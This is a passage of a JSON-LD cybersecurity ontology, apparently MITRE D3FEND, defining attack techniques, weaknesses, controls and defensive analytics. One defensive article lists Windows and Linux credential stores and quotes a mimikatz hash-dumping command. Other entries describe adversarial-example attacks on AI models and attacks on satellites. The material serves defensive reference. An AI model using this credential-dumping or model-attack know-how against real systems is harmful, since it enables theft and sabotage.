      "d3f:definition": "In Black-Box Transfer attacks, the adversary uses one or more proxy models (trained via [Create Proxy AI Model](/techniques/AML.T0005) or [Train Proxy via Replication](/techniques/AML.T0005.001)) that they have full access to and that are representative of the target model.\nThe adversary uses [White-Box Optimization](/techniques/AML.T0043.000) on the proxy models to generate adversarial examples.\nIf the set of proxy models is close enough to the target model, the adversarial example should generalize from one to another.\nThis means that an attack that works for the proxy models will likely then work for the target model.\nIf the adversary has [AI Model Inference API Access](/techniques/AML.T0040), they may use [Verify Attack](/techniques/AML.T0042) to confirm the attack is working and incorporate that information into their training process.",
      "rdfs:label": "Black-Box Transfer - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0043.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0043"
      },
      "skos:prefLabel": "Black-Box Transfer"
    },
    {
      "@id": "d3f:CWE-611",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-611",
      "d3f:definition": "The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.",
      "d3f:synonym": "XXE",
      "d3f:weakness-of": {
        "@id": "d3f:ExternalContentInclusionFunction"
      },
      "rdfs:label": "Improper Restriction of XML External Entity Reference",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-610"
        },
        {
          "@id": "_:Na02a0a4d8de6442e9be89849e0a4c4a2"
        }
      ]
    },
    {
      "@id": "_:Na02a0a4d8de6442e9be89849e0a4c4a2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExternalContentInclusionFunction"
      }
    },
    {
      "@id": "d3f:T1109",
      "@type": "owl:Class",
      "d3f:attack-id": "T1109",
      "d3f:definition": "Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1019) but conducted upon other system components that may not have the same capability or level of integrity checking. Malicious device firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1542.002",
      "rdfs:label": "Component Firmware",
      "rdfs:seeAlso": {
        "@id": "d3f:T1542.002"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        }
      ]
    },
    {
      "@id": "d3f:ControlFlowPolicy",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A control flow policy is a subset of the possible control flow transfers computed from a program's control flow graph. It defines only the expected and allowed control flow transfers and is enforced by control flow integrity.",
      "rdfs:label": "Control Flow Policy",
      "rdfs:subClassOf": {
        "@id": "d3f:ControlFlowGraph"
      }
    },
    {
      "@id": "d3f:may-be-hardened-against-by",
      "@type": "owl:ObjectProperty",
      "d3f:pref-label": "may be hardened against by",
      "owl:inverseOf": {
        "@id": "d3f:may-harden"
      },
      "rdfs:label": "may-be-hardened-against-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:attack-may-be-countered-by"
      }
    },
    {
      "@id": "d3f:CWE-831",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-831",
      "d3f:definition": "The product defines a function that is used as a handler for more than one signal.",
      "rdfs:label": "Signal Handler Function Associated with Multiple Signals",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-364"
      }
    },
    {
      "@id": "d3f:T1569.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1569.002",
      "d3f:definition": "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).",
      "rdfs:label": "Service Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:T1569"
      }
    },
    {
      "@id": "d3f:CWE-323",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-323",
      "d3f:definition": "Nonces should be used for the present occasion and only once.",
      "rdfs:label": "Reusing a Nonce, Key Pair in Encryption",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-344"
      }
    },
    {
      "@id": "d3f:BayesianModelAveraging",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BMA",
      "d3f:definition": "A parameter estimate (or a prediction of new observations) obtained by averaging the estimates (or predictions) of the different models under consideration, each weighted by its model probability.",
      "d3f:kb-article": "## References\nEnsemble learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Ensemble_learning).\n\nBayesian model average: A parameter estimation approach to model agnostic ensemble learning. (2019). Journal of Machine Learning for Modeling and Computing, 1(2), 61-70.  [Link](https://journals.sagepub.com/doi/full/10.1177/2515245919898657#:~:text=Bayesian%20model%20average%3A%20A%20parameter,weighted%20by%20its%20model%20probability).",
      "rdfs:label": "Bayesian Model Averaging",
      "rdfs:subClassOf": {
        "@id": "d3f:EnsembleLearning"
      }
    },
    {
      "@id": "d3f:LinuxConnect",
      "@type": "owl:Class",
      "d3f:definition": "Initiate a connection on a socket.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/connect.2.html"
      },
      "rdfs:label": "Linux Connect",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIConnectSocket"
      }
    },
    {
      "@id": "d3f:T1583.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1583.003",
      "d3f:definition": "Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.",
      "rdfs:label": "Virtual Private Server",
      "rdfs:subClassOf": {
        "@id": "d3f:T1583"
      }
    },
    {
      "@id": "d3f:AML.T0031",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0031",
      "d3f:definition": "Adversaries may degrade the target model's performance with adversarial data inputs to erode confidence in the system over time.\nThis can lead to the victim organization wasting time and money both attempting to fix the system and performing the tasks it was meant to automate by hand.",
      "rdfs:label": "Erode AI Model Integrity - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0031"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASImpactTechnique"
      },
      "skos:prefLabel": "Erode AI Model Integrity"
    },
    {
      "@id": "d3f:CWE-8",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-8",
      "d3f:definition": "When an application exposes a remote interface for an entity bean, it might also expose methods that get or set the bean's data. These methods could be leveraged to read sensitive information, or to change data in ways that violate the application's expectations, potentially leading to other vulnerabilities.",
      "rdfs:label": "J2EE Misconfiguration: Entity Bean Declared Remote",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:SoftwareRepository",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:SoftwarePackage"
      },
      "d3f:definition": "A software repository, or repo for short, is a storage location for software packages. Often a table of contents is also stored, along with metadata. A software repository is typically managed by source or version control, or repository managers. Package managers automate installing and updating the contents of repositories, sometimes called 'packages'.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Software_repository"
      },
      "rdfs:label": "Software Repository",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Repository"
        },
        {
          "@id": "_:N8a0d8026656b4e519ea2e2dd72728afb"
        }
      ],
      "skos:altLabel": "Package Repository"
    },
    {
      "@id": "_:N8a0d8026656b4e519ea2e2dd72728afb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SoftwarePackage"
      }
    },
    {
      "@id": "d3f:Reference-Munin",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SourceCodeReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://github.com/Neo23x0/munin"
      },
      "d3f:kb-author": "Florian Roth",
      "d3f:kb-reference-title": "Online Hash Checker for Virustotal and Other Services",
      "rdfs:label": "Reference - Munin"
    },
    {
      "@id": "d3f:d3fend-data-property",
      "@type": "owl:DatatypeProperty",
      "rdfs:label": "d3fend-data-property"
    },
    {
      "@id": "d3f:KeyboardInputDevice",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A computer keyboard is a typewriter-style device which uses an arrangement of buttons or keys to act as mechanical levers or electronic switches. Following the decline of punch cards and paper tape, interaction via teleprinter-style keyboards became the main input method for computers. A keyboard is also used to give commands to the operating system of a computer, such as Windows' Control-Alt-Delete combination. Although on Pre-Windows 95 Microsoft operating systems this forced a re-boot, now it brings up a system security options screen.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Computer_keyboard"
      },
      "rdfs:label": "Keyboard Input Device",
      "rdfs:subClassOf": {
        "@id": "d3f:InputDevice"
      },
      "skos:altLabel": [
        "Computer Keyboard",
        "Keyboard"
      ]
    },
    {
      "@id": "d3f:T1219.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1219.002",
      "d3f:definition": "An adversary may use legitimate desktop support software to establish an interactive command and control channel to target systems within networks. Desktop support software provides a graphical interface for remotely controlling another computer, transmitting the display output, keyboard input, and mouse control between devices using various protocols. Desktop support software, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy)",
      "rdfs:label": "Remote Desktop Software",
      "rdfs:subClassOf": {
        "@id": "d3f:T1219"
      }
    },
    {
      "@id": "d3f:KioskComputer",
      "@type": "owl:Class",
      "d3f:definition": "An interactive kiosk is a computer terminal featuring specialized hardware and software that provides access to information and applications for communication, commerce, entertainment, or education. Early interactive kiosks sometimes resembled telephone booths, but have been embraced by retail, food service and hospitality to improve customer service and streamline operations. Interactive kiosks are typically placed in high foot traffic settings such as shops, hotel lobbies or airports.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Interactive_kiosk"
      },
      "rdfs:label": "Kiosk Computer",
      "rdfs:subClassOf": {
        "@id": "d3f:SharedComputer"
      },
      "skos:altLabel": "Interactive Kiosk"
    },
    {
      "@id": "d3f:CWE-564",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-564",
      "d3f:definition": "Using Hibernate to execute a dynamic SQL statement built with user-controlled input can allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands.",
      "rdfs:label": "SQL Injection: Hibernate",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-89"
      }
    },
    {
      "@id": "d3f:AcademicPaperReference",
      "@type": "owl:Class",
      "d3f:pref-label": "Academic Paper",
      "rdfs:label": "Academic Paper Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:TechniqueReference"
      }
    },
    {
      "@id": "d3f:ATTACKEnterpriseTechnique",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK Enterprise Technique",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKEnterpriseThing"
      }
    },
    {
      "@id": "d3f:T1596.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1596.002",
      "d3f:definition": "Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)",
      "rdfs:label": "WHOIS",
      "rdfs:subClassOf": {
        "@id": "d3f:T1596"
      }
    },
    {
      "@id": "d3f:EX-0018.03",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0018.03",
      "d3f:definition": "High-powered microwave (HPM) weapons can be used to disrupt or destroy a satellite’s electronics. A “front-door” HPM attack uses a satellite’s own antennas as an entry path, while a “back-door” attack attempts to enter through small seams or gaps around electrical connections and shielding. A front-door attack is more straightforward to carry out, provided the HPM is positioned within the field of view of the antenna that it is using as a pathway, but it can be thwarted if the satellite uses circuits designed to detect and block surges of energy entering through the antenna. In contrast, a back-door attack is more challenging, because it must exploit design or manufacturing flaws, but it can be conducted from many angles relative to the satellite. Both types of attacks can be either reversible or irreversible; however, the attacker may not be able to control the severity of the damage from the attack. Both front-door and back-door HPM attacks can be difficult to attribute to an attacker, and like a laser weapon, the attacker may not know if the attack has been successful. A HPM attack may leave the target satellite disabled and uncontrollable which can cause it to drift into other satellites, creating further collateral damage.*\n\n*https://aerospace.csis.org/aerospace101/counterspace-weapons-101",
      "rdfs:label": "High-Powered Microwave - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0018/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0018"
      },
      "skos:prefLabel": "High-Powered Microwave"
    },
    {
      "@id": "d3f:IA-0006",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0006",
      "d3f:definition": "Adversaries target hosted payloads as an alternate doorway into the host spacecraft. Hosted payloads often expose their own command sets, file services, and telemetry paths, sometimes via the host’s TT&C chain, sometimes through a parallel ground infrastructure under different operational control. Initial access arises when an attacker obtains the ability to issue payload commands, upload files, or alter memory/register state on the hosted unit. Because data and control must traverse an interface to the host bus (power, time, housekeeping, data routing, gateway processors), the payload–host boundary can also carry management functions: mode transitions, table loads, firmware updates, and cross-strapped links that appear only in maintenance or contingency modes. With knowledge of the interface specification and command dictionaries, a threat actor can activate rarely used modes, inject crafted data products, or trigger gateway behaviors that extend influence beyond the payload itself. In multi-tenant or commercial hosting arrangements, differences in keying, procedures, or scheduling between the payload operator and the bus operator provide additional opportunity for a first foothold that looks like routine payload commanding.",
      "rdfs:label": "Compromise Hosted Payload - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0006/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Compromise Hosted Payload"
    },
    {
      "@id": "d3f:CCI-000197_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, for password-based authentication, transmits only cryptographically-protected passwords.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000197"
    },
    {
      "@id": "d3f:T1216.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1216.001",
      "d3f:definition": "Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via <code>Cscript.exe</code>. For example, the following code publishes a printer within the specified domain: <code>cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com</code>.(Citation: pubprn)",
      "rdfs:label": "PubPrn",
      "rdfs:subClassOf": {
        "@id": "d3f:T1216"
      }
    },
    {
      "@id": "d3f:T1427",
      "@type": "owl:Class",
      "d3f:attack-id": "T1427",
      "d3f:definition": "With escalated privileges, an adversary could program the mobile device to impersonate USB devices such as input devices (keyboard and mouse), storage devices, and/or networking devices in order to attack a physically connected PC(Citation: Wang-ExploitingUSB)(Citation: ArsTechnica-PoisonTap) This technique has been demonstrated on Android. We are unaware of any demonstrations on iOS.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Attack PC via USB Connection - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileLateralMovementTechnique"
      },
      "skos:prefLabel": "Attack PC via USB Connection"
    },
    {
      "@id": "d3f:WirelessAttacker",
      "@type": "owl:Class",
      "d3f:definition": "An attacker who targets wireless communication methods, like Wi-Fi, without needing physical access to the premises.",
      "rdfs:label": "Wireless Attacker",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RemoteAttacker"
        },
        {
          "@id": "_:N605081f99729441a8146f0b374ce14e6"
        },
        {
          "@id": "_:Nc232b2659d82426bb34a39c62552c56e"
        },
        {
          "@id": "_:Neb23d3ac571e4d7baa3d81f9eb03f5d6"
        }
      ]
    },
    {
      "@id": "_:N605081f99729441a8146f0b374ce14e6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLink"
      }
    },
    {
      "@id": "_:Nc232b2659d82426bb34a39c62552c56e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WirelessAccessPoint"
      }
    },
    {
      "@id": "_:Neb23d3ac571e4d7baa3d81f9eb03f5d6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WirelessRouter"
      }
    },
    {
      "@id": "d3f:CCI-002420_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system maintains the confidentiality and/or integrity of information during preparation for transmission.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002420"
    },
    {
      "@id": "d3f:OTProcessDataCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Manage data associated with a controlled process.",
      "rdfs:label": "OT Process Data Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTEvent"
        },
        {
          "@id": "_:N8450c216625447c88b7c4fe0468c2714"
        }
      ]
    },
    {
      "@id": "_:N8450c216625447c88b7c4fe0468c2714",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProcessDataCommand"
      }
    },
    {
      "@id": "d3f:Reference-ARadiationHardenedSARADCWithDelayBasedDualFeedbackFlipFlopsForSensorReadoutSystems",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.mdpi.com/1424-8220/20/1/171"
      },
      "d3f:kb-abstract": "For stable and effective control of the sensor system, analog sensor signals such as temperature, pressure, and electromagnetic fields should be accurately measured and converted to digital bits. However, radiation environments, such as space, flight, nuclear power plants, and nuclear fusion reactors, as well as high-reliability applications, such as automotive semiconductor systems, suffer from radiation effects that degrade the performance of the sensor readout system including analog-to-digital converters (ADCs) and cause system malfunctions. This paper investigates an optimal ADC structure in radiation environments and proposes a successive- approximation-register (SAR) ADC using delay-based double feedback flip-flops to enhance the system tolerance against radiation effects, including total ionizing dose (TID) and single event effects (SEE). The proposed flip-flop was fabricated using 130 nm complementary metal-oxide-semiconductor (CMOS) silicon-on-insulator (SOI) process, and its radiation tolerance was measured in actual radiation test facilities. Also, the proposed radiation-hardened SAR ADC with delay-based dual feedback flip-flops was designed and verified by utilizing compact transistor models, which reflect radiation effects to CMOS parameters, and radiation simulator computer aided design (CAD) tools.",
      "d3f:kb-author": "Duckhoon Ro, Changhong Min, Myounggon Kang, Hyung-Min Lee",
      "d3f:kb-reference-of": {
        "@id": "d3f:RadiationHardening"
      },
      "d3f:kb-reference-title": "A Radiation-Hardened SAR ADC with Delay-Based Dual Feedback Flip-Flops for Sensor Readout Systems",
      "rdfs:label": "Reference - A Radiation-Hardened SAR ADC with Delay-Based Dual Feedback Flip-Flops for Sensor Readout Systems"
    },
    {
      "@id": "d3f:T1417",
      "@type": "owl:Class",
      "d3f:attack-id": "T1417",
      "d3f:definition": "Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal device usage, users often provide credentials to various locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Keylogging](https://attack.mitre.org/techniques/T1417/001)) or rely on deceiving the user into providing input into what they believe to be a genuine application prompt (e.g. [GUI Input Capture](https://attack.mitre.org/techniques/T1417/002)).",
      "rdfs:label": "Input Capture - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
        }
      ],
      "skos:prefLabel": "Input Capture"
    },
    {
      "@id": "d3f:T1523",
      "@type": "owl:Class",
      "d3f:attack-id": "T1523",
      "d3f:definition": "Malicious applications may attempt to detect their operating environment prior to fully executing their payloads. These checks are often used to ensure the application is not running within an analysis environment such as a sandbox used for application vetting, security research, or reverse engineering.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1633.001",
      "rdfs:label": "Evade Analysis Environment - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1633.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileDiscoveryTechnique"
        }
      ],
      "skos:prefLabel": "Evade Analysis Environment"
    },
    {
      "@id": "d3f:T1053.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1053.004",
      "d3f:creates": {
        "@id": "d3f:PropertyListFile"
      },
      "d3f:definition": "This technique is deprecated due to the inaccurate usage. The report cited did not provide technical detail as to how the malware interacted directly with launchd rather than going through known services. Other system services are used to interact with launchd rather than launchd being used by itself.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique is deprecated due to the inaccurate usage. The report cited did not provide technical detail as to how the malware interacted directly with launchd rather than going through known services. Other system services are used to interact with launchd rather than launchd being used by itself.",
      "rdfs:label": "Launchd",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1053"
        },
        {
          "@id": "_:Nfad525e0388b44b482cd304279c54532"
        }
      ]
    },
    {
      "@id": "_:Nfad525e0388b44b482cd304279c54532",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PropertyListFile"
      }
    },
    {
      "@id": "d3f:step-1",
      "@type": "owl:NamedIndividual",
      "d3f:invokes": {
        "@id": "d3f:CopyToken"
      },
      "d3f:next": {
        "@id": "d3f:step-2"
      },
      "rdfs:label": "Step 1 - Copy Token"
    },
    {
      "@id": "d3f:CredentialCompromiseScopeAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CredentialCompromiseScopeAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:Credential"
      },
      "d3f:d3fend-id": "D3-CCSA",
      "d3f:definition": "Determining which credentials may have been compromised by analyzing the user logon history of a particular system.",
      "d3f:kb-article": "## How it works\n\n#### Memory\nCredentials may be stored in memory for a variety of reasons; on Windows, they may be stored in lsass.exe.  Once a credential dumper like mimikatz runs and dumps the memory of lsass.exe, the credentials of every account logged on since boot are potentially compromised.\nWhen such an event occurs, this analytic will give the forensic context to identify compromised users. Those users could potentially be used in later events for additional logons.\n\n\n#### Hard disk\nOperating System may cache a certain number of credentials onto the hard disk to use as a source of truth if it cannot contact the credential server.  In many versions of Microsoft Windows, the 10 most recent are cached by default; this setting can be changed in the Microsoft Management Console's Local Security Policy: ```Computer Configuration -> Windows Settings -> Local Policy -> Security Options -> Interactive Logon: Number of previous logons to cache -> 0```  Here we are not concerned with the alteration of the credentials but the fact that they might be read.  If the attacker has physical access to the machine they are unlikely to be stopped from reading files on the filesystem.\n\"In the event that the domain controller is unavailable Windows will check the last password hashes that has been cached in order to authenticate the user with the system. These password hashes are cached in the following registry setting:\nHKEY_LOCAL_MACHINE\\SECURITY\\Cache\nMimikatz can retrieve these hashes if the following command is executed:\nlsadump::cache\" [1]\n\nThe Registry Hive, HKEY_LOCAL_MACHINE\\SAM, which is stored in the supporting files %systemroot%\\System32\\Config\\{Sam,sam.log,sam.sav}, contains the SAM file.\n\nDC: This is stored in %systemroot%\\ntds\\ntds.dit. (https://www.ultimatewindowssecurity.com/blog/default.aspx?d=10/2017)\n\nSometimes memory, which contains credentials, could get on the hard disk. Like with hiberfil.sys in Windows. 
 Equivalent on Linux\n\n\nIn Linux, an attacker could read the /etc/shadow file.\n\nReading from /proc directory: mimipenguin, many others.\n\n## Considerations\nEffective implementation requires identifying any location that could end up containing credentials, and detecting any method of potential access to a source of credential data.\n\n1. https://medium.com/blue-team/preventing-mimikatz-attacks-ed283e7ebdd5",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-AllLoginsSinceLastBoot_MITRE"
        },
        {
          "@id": "d3f:Reference-SystemsAndMethodsForDetectingCredentialTheft_SymantecCorp"
        }
      ],
      "rdfs:label": "Credential Compromise Scope Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:N0f8a107e821d4ce086c4044a7c854d1d"
        }
      ]
    },
    {
      "@id": "_:N0f8a107e821d4ce086c4044a7c854d1d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:LocalAreaNetworkAttacker",
      "@type": "owl:Class",
      "d3f:definition": "An attacker who exploits vulnerabilities within the same local area network.",
      "d3f:synonym": "LAN Attacker",
      "rdfs:label": "Local Area Network Attacker",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LocalAttacker"
        },
        {
          "@id": "_:Nc79145487beb477fa186359cd57c728c"
        }
      ]
    },
    {
      "@id": "_:Nc79145487beb477fa186359cd57c728c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalAreaNetwork"
      }
    },
    {
      "@id": "d3f:injects",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x injects y: The subject x takes the action of exploiting a security flaw by introducing (injecting) y, which is code or data that will change the course of execution or state of a computing process to an alternate course or state. Typically code injection is associated with adversaries intending the alternate course to facilitate a malevolent purpose; however, code injection can be unintentional or the intentions behind it may be good or benign.",
      "rdfs:label": "injects",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Code_injection"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/00916722-v"
        }
      ],
      "rdfs:subPropertyOf": {
        "@id": "d3f:executes"
      }
    },
    {
      "@id": "d3f:DiscoveryTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to figure out your environment.",
      "d3f:enables": {
        "@id": "d3f:TA0007"
      },
      "rdfs:label": "Discovery Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N45ce1a6139be45948390dc0dbd71607c"
        }
      ]
    },
    {
      "@id": "_:N45ce1a6139be45948390dc0dbd71607c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0007"
      }
    },
    {
      "@id": "d3f:CWE-628",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-628",
      "d3f:definition": "The product calls a function, procedure, or routine with arguments that are not correctly specified, leading to always-incorrect behavior and resultant weaknesses.",
      "rdfs:label": "Function Call with Incorrectly Specified Arguments",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-573"
      }
    },
    {
      "@id": "d3f:PER-0004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:CryptographicKey"
      },
      "d3f:attack-id": "PER-0004",
      "d3f:definition": "The adversary cements control by changing the cryptographic material the spacecraft uses to authenticate or protect links and updates. Targets include uplink authentication keys and counters, link-encryption/session keys and key-encryption keys (KEKs), key identifiers/selectors, and algorithm profiles. Using authorized rekey commands or key-loading procedures, often designed for over-the-air use, the attacker installs new values in non-volatile storage and updates selectors so subsequent traffic must use the attacker’s keys to be accepted. Variants desynchronize anti-replay by advancing counters or switching epochs, or strand operators by flipping profiles to a mode for which only the adversary holds parameters. Once replaced, the new material persists across resets and mode changes, turning the spacecraft into a node that recognizes the adversary’s channel while rejecting former controllers.",
      "rdfs:label": "Replace Cryptographic Keys - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/PER-0004/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTAPersistenceTechnique"
        },
        {
          "@id": "_:N31f0b4a340f34c48b469464e7fd22647"
        }
      ],
      "skos:prefLabel": "Replace Cryptographic Keys"
    },
    {
      "@id": "_:N31f0b4a340f34c48b469464e7fd22647",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CryptographicKey"
      }
    },
    {
      "@id": "d3f:SystemUtilizationRecord",
      "@type": "owl:Class",
